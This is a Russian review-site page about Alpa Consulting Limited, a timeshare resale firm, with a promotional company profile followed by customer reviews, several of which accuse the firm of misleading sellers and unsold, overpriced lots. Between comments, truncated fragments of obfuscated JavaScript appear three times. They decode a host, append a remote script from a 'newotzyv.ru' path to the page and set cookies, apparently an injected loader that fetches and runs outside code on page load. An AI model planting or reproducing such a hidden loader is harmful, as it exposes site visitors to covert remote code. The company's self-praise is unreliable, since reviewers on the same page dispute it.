Alpa Consulting Limited

Количество просмотров: 1045
Средняя оценка: 4 (8 голосов)

Alpa Consulting Limited (Альпа Консалтинг Лимитед) имеет большой опыт работы в сфере интернет-маркетинга. Особое место в пакете ее услуг занимает купля-продажа сертификатов клубного отдыха – таймшеров. Компания не приобретает их у продавца за собственные средства, а выставляет на торги на электронной бирже Farlega Investments Limited (США).

Купить/продать таймшер поможет Alpa Consulting Limited

Достижения компании

Клубный отдых с каждым годом находит все больше новых приверженцев в мире. Об этом свидетельствуют и итоги деятельности Alpa Consulting Limited за период ее сотрудничества с ведущей консалтинговой компанией США Farlega Investments Limited. Менее чем за 3 года на ее площадке реализовано 12 000 сертификатов таймшер от прежних владельцев. 60 000 таймшеров купили новые клиенты из 29 стран. Общая сумма продаж превысила 400 миллионов долларов.

По ряду причин Россия оказалась вне этой общемировой тенденции, и Alpa Consulting Limited делает все,чтобы изменить сложившуюся ситуацию.

Гарантии успеха

Как сказал в видеообращении на сайте президент компании Макеш Панчари, в отношениях с клиентами он никогда не ограничивается договорными обязанностями. Для него очень важны просто дружеские доверительные отношения, возникающие, если во главу угла ставятся не коммерческие соображения, а этика и добропорядочность. На этих китах и стоит прозрачный бизнес Alpa Consulting Limited.

Вывод о честности и заинтересованности компании в продаже таймшеров, причем по максимальной цене, вытекает из ее уникальных предложений:

1)    от клиента не требуется никаких предварительных взносов, все допродажное оформление таймшеров – установку подлинности и оценивание – компания сначала осуществляет за свой счет;

2)    комиссионные представляют собой определенный процент от суммы сделки, и получить их компания может лишь после продажи сертификата.

Зачем продавать

Желание некоторых владельцев избавиться от сертификата на столь статусный и популярный отдых на первый взгляд кажется не вполне логичным. Конечно, российские владельцы – особая статья. В 90-е годы они вложили в таймшеры солидные средства, после чего те мертвым грузом пролежали у них 20 лет. Понятно, что теперь каждый рад воспользоваться предложением компании Alpa Consulting Limited продать таймшер. Нужно время, чтобы вернуть доверие россиян к системе таймшер, и они снова стали покупать сертификаты.

Что касается зарубежных пользователей, то их желания и обстоятельства разные: кому-то срочно понадобились деньги, кому-то наскучил его курорт. Но для большинства продажа таймшера – просто бизнес: они покупают, когда его цена минимальна, несколько лет пользуются преимуществами клубного отдыха и продают сертификат на пике его стоимости.

Как это делается

Если осуществить первичную продажу таймшера новому владельцу, Alpa Consulting Limited может самостоятельно в любой стране мира, в том числе и в России, то, чтобы помочь кому-то продать его, ей нужна помощь других компаний с особой специализацией. Механизм такого сотрудничества уже хорошо отработан.

Российские владельцы не могут самостоятельно продать свой таймшер по двум причинам:

1)    в России нет вторичного рынка ценных бумаг этого вида;

2)    американская электронная биржа Farlega Investments Limited (http://www.farlega.ph/ru), продающая таймшеры, работает только с юридическими лицами, т. е. компаниями.

К тому же прежде чем продать свой таймшер владелец должен документально подтвердить его подлинность, статус и стоимость. Услуги экспертизы и оценки оказывает Alpa Consulting Limited и она же, будучи аккредитованным агентом системы Spacebank, работающей на площадке Farlega, выставляет сертификат на торги.

Официальный сайт компании содержит подробную информацию: http://www.alpa-consulting.com/ru

Счетчик отзывов для вашего сайта

Добавить отзыв

Отзывы о компании Alpa Consulting Limited

Средняя оценка: 3 (2 голосов)

Ситуация не меняется с прошлого года ) Люди жалуются и трындят про отсутствие продаж, а Альпа по прежнему что-то продаёт, всем врагам на зло, видимо ) Я уже третий продаю и два обменял ) копеечка на хлебушек от этого есть )) Люди, ну научитесь вы уже разбираться в выгодно и не выгодно, и будет вам счастье, а пока живут лохи, будут и те, кто живёт за счёт этих лохов )

ответить
Средняя оценка: 3.7 (3 голосов)

Что-то мне как-то страшновато… Отдала продать, но столько страхов начиталась, что теперь думаю, ну его в баню ети 3-4 тыщ евро, валялся бы себе и валялся…Очень надеюсь, что всё будет быстро. Жду вторую неделю, пока тишина.

ответить
Средняя оценка: 5 (1 оценка)

Уважаемые господа !   Прочитал о ваших достижениях сколько Вы наработали менее чем за 3 года.Только вот не понял какой вы считайте период . Исходя из анализа компаний-брокеров торговой площадки farlega  ваши показатели не внушают оптимизма. В геометрической прогрессии уменьшаются  объемы продаж  и вместе с этим и количество сделок  ( 2014 г. - 77732 сделки;  2015г. - 2931 сделок).  Начало 2016 года также не радует за период с 12.01.2016 г. по 14.03.2016г. всего  - 524 сделки, а за эти же периоды 2015 и 2014 г.г. это  - 867 и 14011 сделок  соответственно. Из ваших цифр,  я понял, что 12 тыс. - это продано сертификатов граждан России и из 60 тыс. купленных таймшеров также есть россияни. Получается не полная картина достижений компании (ACL).  И если быть до конца честными в ваших  отчетах, хотелось бы еще узнать  о том,  сколько за  указанный вами период не было продано сертификатов и в чем причина такой неудачи. Вот только по  одному клубу Oasis club - около 40 лотов,  выставленных вашей компанией ,теперь украшают архивы клуба, а один лот просто шедевр маркетинга за № 10086538  стоимостью 220000 евро. С таким отношением, Вы все дальше и дальше отдаляйте от себя клиентов и  тем самым  идете в противоречие с уникальным видеообращением на сайте вашего президента Макеш Панчари.  Необходимо прислушаться к словам президента и работать не только на себя, свою компанию,  но и на клиента. Надо завоевать доверие россиян, но для этого надо чтобы каждый  кто купит таймшер , гарантировано смог бы его  продать через вашу  компанию Alpa  Consulting (LTD) .  Я уже писал отзыв на этом сайте 28.02.2016г.   о том , как в период кризиса  в 2015 г., хотел продать свой сертификат через вашу компанию, но все пошло не так,  как я ожидал  из речи вашего президента.  В настоящее время я также желаю продать свой сертификат через вашу компанию на обоюдных договорных условиях и считаю, что это возможно без обид бизнес есть бизнес. Я думаю, что со мной согласятся и другие клиенты, которые также не смогли продать свои таймшеры  на бирже farlega и сейчас не знают,  что дальше с ними делать. Попробовать никогда не поздно все данные по продавцам у Вас есть дело только за вами.   Если Вы сделайте правильный шаг, то вслед за этим подтянутся и другие российские держатели сертификатов и их не надо будет разыскивать по всей стране. При этом кто-то захочет продать таймшер, а кто-то наоборот  купить или обменять. Все зависит от нас самих.       С уважением Вадим.                                    

ответить
Голосов еще нет

Я знаю эту компанию – Альпа консалтинг. В прошлом году удачно продал через нее свой таймшер Анфи бич клуба, куда не ездил уже четыре года. Не думал что в России смогу его кому-то втюхать, все боятся с рук покупать, тем более таймшеры. А компания эта продает на американской бирже, которая, конечно, берет процент, да и Альпа берет. Но и на руки прилично получил.   

ответить
Средняя оценка: 1 (1 оценка)

Уважаемый Роман Евгеньевич! Смотрю постоянно отзывы о компании ALPA CONSULTING LIMITED на различных россйских сайтах и везде в основном рекламные отзывы ,нет ни одного слова или предложения из лексикона торговой площадки биржи ffarlega, а только общие шаблонные фразы и  сертификаты продают одних  и тех же клубов. Я уже имею горький опыт сотрудничества по продаже сертификата  клуба Royal Sun Resort  на бирже farlega  в сентябре-ноябре 2015 года и могу сказать. что брокеры компании - монополиста на российском  рынке тайшмеров  (ACL), уже давно не руководствуются принципами этичности и порядочности, а также индивидуальному подходу к каждому клиенту.Именно на этих формах  и методах работы акцентрировал  свое внимание президент индийской компании Макеш Панчари После оканчания торгов на бирже, мне просто - напросто сказали открытым текстом, что Ваш сертификат никому не нужен и прекратили дальнейшее сотрудничество.Только после того,  как меня кинули ,  я через личный кабинет на бирже подал жалобу на компанию в администрацию Spaceban, но мои жалобы почему регистрируются,но дальше России не уходят. Ладно было бы не обидно если бы кинули меня одного. Изучая торговлю на бирже и работу других компаний -продавцов(агентов), а таже просматривая лоты на продажу различных клубов, я пришел к выводу, что шансов на продажу моего сертификата с  завышенной ценой в два раза от оценочной   стоимости,  шансов  не было с первого дня торгов. В архивах биржи farlega (www.farlega.ph ) в раздели лотов я обнаружил десятки непроданных сертификатов (ACL)  по различным клубам в т.ч. и (RSR). Схема продажи аналогичная,как и продажа моего сертификата. И что интересно у  других компаний я такого брака не обнаружил. Это легко проверить стоит только зайти на сайт биржи farlega (см. выше). Вывод напрашивается только один, что брокеры компании (ACL) московского филиала( не хочу обидеть всю компанию) работают только ради своей выгоды, а не в интересах самого клиента. Вот  Вам и небольшая правда о компании. Если очень интересно, то можно более детальную информацию. С уважением Вадим.

ответить
Голосов еще нет

Добрый день Вадим!  Мне тут позвонили с этой компании по продаже таймшера, откудато нашли мой номер не знаю. Хочу сказать вы правы на 100, мы с вами коллеги по несчатью. Я тоже не продал свой сертификат на бирже Фарлега, хотя я заплатил все экспертизу, доверенности и.тд. Мне нервы потрепали больше пол года, в резултате шышь. . Вот, теперь снова заманивают, задолбали эти мошенники, так напрашиваются на неприятности, что кто то может не выдержать обман. А так я считаю, давайте делать бизнес обоюдно, продадите, выиграете сами в первую очередь бабки халявные. Вот тоже держу свой сертификат, жду лучшие времена когда настанет.

С ув.Ибрагим

С 

ответить
Голосов еще нет

Добрый день Ибрагим ! Хотелось бы поподробнее узнать в каком году ваш сертификат продавался на бирже FARLEGA , какого клуба, по какой цене был выставлен лот, его номер и кто был брокером. В какую общую сумму Вам обошлась эта торговля?  Был ли у вас личный кабинет на бирже или нет и как Вы общались с брокером. Что означают Ваши слова, что "вот теперь снова заманивают". Интересно на каких условиях.  14 марта 2016 года,  я уже поднимал эту тему,  по повторной продаже сертификатов и считаю ,что при обоюдовыгодном подходе компании (ACL) и клиентов эти вопросы вполне решаемые, безусловного для каждого случая в индивидуальном порядке с детальной проработкой нормативных документов в особенности ДОГОВОРА КОМИССИИ и пожеланий президента компании ALPA CONSULTING (LTD) господина  Макеш Панчари. Если кому-то интересна эта  тема,  можно обсудить хужу от этого не станет, но проблема может сдвинутся с мертвой точки. С   уважением Вадим.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "newotzyv.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]>

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "newotzyv.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]>

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "newotzyv.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]>

ответить
Голосов еще нет

Добрый день Вадим. Как раз сегодня 23.03.2016 года мне уже третий раз позвонили из выше указанной фирмы и предлагают продать мой сертификат, купленный 2007году. Я все таки  думаю, что это опять афера. Ну почему никак нельзя нормально вести бизнес, без обмана.

ответить
Голосов еще нет

Добрый день Лилия. Если у вас есть желание,  принять  правильное решение,  не надо принимать мой отзыв о компании ООО (ACL) за оксиому , а более прогматично и индивидуально подойти к этому вопросу. Рад буду вам помочь советом, только не на этом сайте,   С  уважением Вадим .

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "newotzyv.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]>

ответить